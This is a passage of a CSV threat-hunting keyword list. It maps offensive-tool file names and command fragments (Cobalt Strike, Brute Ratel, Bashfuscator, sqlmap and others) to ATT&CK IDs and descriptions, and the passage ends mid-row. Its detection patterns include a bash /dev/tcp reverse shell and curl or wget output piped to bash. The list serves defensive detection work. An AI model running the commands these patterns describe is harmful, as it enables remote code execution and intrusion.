+"*BackupOperatorToDA-master*","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","335","48","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" +"*BackupPrivSAM \\*","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/m57/cobaltstrike_bofs","1","0","N/A","10","10","153","25","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z" +"*backupprivsam.*","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/m57/cobaltstrike_bofs","1","1","N/A","10","10","153","25","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z" +"*bad client public DH value*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*Bad HTTP verb.*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" +"*badger_exports.h*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*badger_no_acl_1030_objects.log*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*badger_svc.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*badger_template.ps1*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*badger_x64.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*badger_x64_*.bin*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*badger_x64_aws.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*badger_x64_stealth_rtl.txt*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*BadgerAtoi*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*BadgerDispatch*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*BadgerDispatchW*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*BadgerMemcpy*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*BadgerMemset*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*BadgerStrcmp*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*BadgerStrlen*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*BadgerWcscmp*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*BadgerWcslen*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*Bad-Pdf*","offensive_tool_keyword","Bad-PDF","Bad-PDF create malicious PDF file to steal NTLM(NTLMv1/NTLMv2) Hashes from windows machines. it utilize vulnerability disclosed by checkpoint team to create the malicious PDF file. Bad-Pdf reads the NTLM hashes using Responder listener.","T1566.001 - T1189 - T1068 - T1207 - T1048 - T1003","TA0001 - TA0002 - TA0003 - TA0009 - TA0010 - TA0011","N/A","N/A","Credential Access","https://github.com/deepzec/Bad-Pdf","1","1","N/A","N/A","10","981","214","2020-08-19T06:54:51Z","2018-04-29T15:21:35Z" +"*BadPotato.cs*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/BeichenDream/BadPotato","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*BadPotato.exe*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" +"*badpotato.exe*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/BeichenDream/BadPotato","1","1","N/A","N/A",,"N/A",,, +"*badtouch*","offensive_tool_keyword","badtouch","Scriptable network authentication cracker","T1110 - T1210.001 - T1558.003","TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/kpcyrd/badtouch","1","0","N/A","N/A","4","363","44","2022-03-24T09:53:51Z","2018-03-15T22:27:56Z" +"*BadUSB_AddAdmin.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*BadUSB_DownloadExecute.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*BadUSB_FacebookPost.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*BadUSB_HideWindow.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*BadUSB_LockYourComputer.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*BadZure-main*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","1","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z" +"*bananaKitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*BaRMIe*","offensive_tool_keyword","BaRMIe","BaRMIe is a tool for enumerating and attacking Java RMI (Remote Method Invocation) services.","T1522 - T1070 - T1573 - T1071","TA0001 - TA0003 - TA0008 - TA0011","N/A","N/A","Information Gathering","https://github.com/NickstaDB/BaRMIe","1","0","N/A","N/A","7","692","107","2017-09-28T22:38:02Z","2017-09-24T18:54:12Z" +"*baron-samedit-heap-based-overflow-sudo.txt*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*base64_conversion_commands.ps1*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*base64_conversion_commands.ps1*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*bash -c *curl *.sh | bash*","greyware_tool_keyword","bash","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*bash -c *wget *.sh | bash*","greyware_tool_keyword","bash","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*bash -i >& /dev/tcp/*/* 0>&1*","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*bash -i >& /dev/tcp/*/* 0>&1*","greyware_tool_keyword","bash","bash reverse shell","T1071 - T1071.004 - T1021","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*bash lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*bash_executor *","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*bash_read_line_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*bashfuscator -*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" +"*Bashfuscator Team*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" +"*bashfuscator.py*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","1","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" +"*Bashfuscator-master*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","1","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" +"*BasicServiceExploit.class*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*BastilleResearch*","offensive_tool_keyword","Github Username","Open source testing tools for the SDR & security community","T1179 - T1141 - T1142 - T1143","TA0011 - ","N/A","N/A","Exploitation tools","https://github.com/BastilleResearch","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*--batch --dump -T *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*Bates.exe --kill*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*Bates.exe --listen*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*bats3c/ADCSPwn*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" +"*bats3c/darkarmour*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" +"*bats3c/DarkLoadLibrary*","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","10","9","875","184","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" +"*bats3c/EvtMute*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" +"*bawait_upload*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 